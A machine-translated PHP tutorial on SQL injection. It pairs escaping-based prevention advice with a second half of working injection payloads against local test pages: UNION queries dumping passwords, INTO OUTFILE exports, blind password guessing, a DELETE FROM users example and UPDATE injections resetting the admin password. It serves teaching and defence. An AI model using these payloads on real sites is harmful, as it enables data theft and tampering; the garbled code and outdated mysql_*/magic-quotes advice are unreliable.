PHP SQL injection attack and precaution precautions

Source: Internet
Author: User
Tags sql injection attack sql injection prevention
    1. supposed input
    2. $name = "Ilia"; DELETE from users; ";
    3. mysql_query ("SELECT * from users WHERE name= ' {$name} '");
Copy Code

It is clear that the last command executed by the database is:

    1. SELECT * from users WHERE Name=ilia; DELETE from users
Copy Code

This has disastrous consequences for the database – all records have been deleted.

However, if the database used is MySQL, then fortunately, the mysql_query () function does not allow you to perform such operations directly (multiple statement operations cannot be done in a single line), so you can rest assured. If you are using a database that is SQLite or PostgreSQL to support such statements, then you will be in for a catastrophe.

As mentioned above, SQL injection is mainly to commit unsafe data to the database to achieve the purpose of the attack. In order to prevent SQL injection attacks, PHP comes with a function to process the input string, the input can be in the lower level of security preliminary processing, also known as Magic Quotes. (PHP.ini MAGIC_QUOTES_GPC). If the MAGIC_QUOTES_GPC option is enabled, then the single quotation marks, double quotes, and some other characters in the input string will be automatically preceded by a backslash \.

But Magic quotes is not a very general solution, it does not block all potentially dangerous characters, and magic quotes is not enabled on many servers. So there are a number of other ways we need to prevent SQL injection.

Many databases themselves provide this input data processing capability. For example, PHP's MySQL operator function has a function called mysql_real_escape_string () that can escape special characters and characters that might cause errors in database operations. This piece of code:

    1. If the Magic quotes function is enabled

    2. if (GET_MAGIC_QUOTES_GPC ()) {
    3. $name = Stripslashes ($name);
    4. }else{
    5. $name = mysql_real_escape_string ($name);
    6. }

    7. mysql_query ("SELECT * from users WHERE name= ' {$name} '");

Copy Code

Note that before using the functionality of the database, it is important to determine if the magic quotes is turned on, as in the previous example, or else two repetitions will go wrong. If MQ is enabled, add \ Remove to get real data.

In addition to preprocessing the data in the above-mentioned string form, you should also pay attention to preprocessing when storing binary data into the database. Otherwise, the data may conflict with the storage format of the database itself, causing the database to crash, data records to be lost, and even the entire library's data to be lost. Some databases, such as PostgreSQL, provide a function pg_escape_bytea (), which is designed to encode binary data, which can encode data similar to Base64.

For example:

    1. For Plain-text data use:

    2. Pg_escape_string ($regular _strings);

    3. For binary data use:

    4. Pg_escape_bytea ($binary _data);

Copy Code

In another case, such a mechanism should also be used. That is, the database system itself does not support multi-byte languages such as Chinese, Japanese and so on. Some of them overlap the range of ASCII and binary data.

Here are recommended two articles about PHP SQL injection prevention, one is 360 security provided, another author collects php anti-SQL injection code, very powerful very useful.
    • PHP anti-SQL injection code (360 provided)
    • PHP code to prevent SQL Injection Vulnerability filter functions

However, encoding the data will likely result in invalid query statements such as like abc%.

PHP SQL injection Implementation (Test code is very safe)

The focus of SQL injection is to construct SQL statements, and only use SQL statements flexibly to construct the injected string of the bull ratio. After finishing the study, I wrote some notes, ready to use. I hope you understand the basic principles of SQL before you look at the following content. The code in the note comes from the network. = = = Basic Part = = = This table queries: Http://127.0.0.1/injection/user.php?username=angel ' and LENGTH (password) = ' 6 http://127.0.0.1/ Injection/user.php?username=angel ' and Left (password,1) = ' m

Union UNION statement: http://127.0.0.1/injection/show.php?id=1 ' Union select 1,username,password from user/* http://127.0.0.1/ Injection/show.php?id= ' Union select 1,username,password from user/*

Export file: Http://127.0.0.1/injection/user.php?username=angel ' into outfile ' c:/file.txt http://127.0.0.1/injection/ User.php?username= ' or 1=1 into outfile ' c:/file.txt http://127.0.0.1/injection/show.php?id= ' union select 1,username, Password from user into outfile ' c:/user.txt

Insert statement: INSERT INTO ' user ' (userid, username, password, homepage, userlevel) VALUES (' ', ' $username ', ' $password ', ' $hom Epage ', ' 1 '); Construct Homepage Value: http://jbxue.com ', ' 3 ') # SQL statement changed to: INSERT into ' user ' (userid, username, password, homepage, userlevel) VALUES (' ', ' Angel ', ' mypass ', ' http://jbxue.com ', ' 3 ') # ', ' 1 ');

UPDATE statement: I like this kind of thing first understand this sentence SQL

    1. UPDATE user SET password= ' MD5 ($password) ', homepage= ' $homepage ' WHERE id= ' $id '
Copy Code

If this SQL is modified to the following form, inject 1 is implemented: Modify the homepage value to http://jbxue.com ', userlevel= ' 3 after the SQL statement becomes

    1. UPDATE user SET password= ' mypass ', homepage= ' http://jbxue.com ', userlevel= ' 3 ' WHERE id= ' $id '
Copy Code

Userlevel for User Level 2: Modify the password value to

    1. Mypass) ' WHERE username= ' admin ' #
Copy Code

The SQL statement then changes to

    1. UPDATE user SET password= ' MD5 (mypass) ' where username= ' admin ' #) ', homepage= ' $homepage ' where id= ' $id '
Copy Code

3: Modify the ID value to ' OR username= ' admin ' after the SQL statement becomes

    1. UPDATE user SET password= ' MD5 ($password) ', homepage= ' $homepage ' WHERE id= ' OR username= ' admin '
Copy Code

= = = Advanced Part = = = Common MySQL built-in function database () USER () System_user () Session_user () Current_User () database () version () SUBSTRING () MID () char () load_file () ... The function applies UPDATE article SET title=database () WHERE id=1 http://127.0.0.1/injection/show.php?id=-1 Union Select 1,database (), Version ()

    1. SELECT * from user WHERE Username=char (97,110,103,101,108)
    2. # char (97,110,103,101,108) equals Angel, Decimal
Copy Code

Http://127.0.0.1/injection/user.php?userid=1 and Password=char (109,121,112,97,115,115) http://127.0.0.1/injection /user.php?userid=1 and Left (password,1) >char (+) Http://127.0.0.1/injection/user.php?userid=1 and Ord (Mid ( password,3,1)) >111

Determine the number and type of fields in a data structure http://127.0.0.1/injection/show.php?id=-1 Union select 1,1,1 http://127.0.0.1/injection/show.php?id= -1 Union Select char ($), char ($), char (97)

Guess data table name http://127.0.0.1/injection/show.php?id=-1 Union select 1,1,1 from

Cross-table query gets user name and password http://127.0.0.1/ymdown/show.php?id=10000 Union select 1,username,1,password, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1

Other #验证第一位密码 http://127.0.0.1/ymdown/show.php?id=10 Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_ User where id=1 and Ord (Mid (password,1,1)) =49

= = = Injection Prevention = = = Server Aspect MAGIC_QUOTES_GPC set to on Display_errors set to off encoding aspect

    1. $keywords = Addslashes ($keywords);
    2. $keywords = Str_replace ("_", "\_", $keywords);
    3. $keywords = str_replace ("%", "\%", $keywords);
Copy Code

Numeric type use Intval () to grab the string type in the SQL statement parameter to add the single quotation mark below the code to prevent injection

    1. if (GET_MAGIC_QUOTES_GPC ()) {
    2. //....
    3. }else{
    4. $str = mysql_real_escape_string ($STR);
    5. $keywords = Str_replace ("_", "\_", $keywords);
    6. $keywords = str_replace ("%", "\%", $keywords);
    7. }
Copy Code

Useful Functions Stripslashes () GET_MAGIC_QUOTES_GPC () mysql_real_escape_string () strip_tags () Array_map () addslashes ()

  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.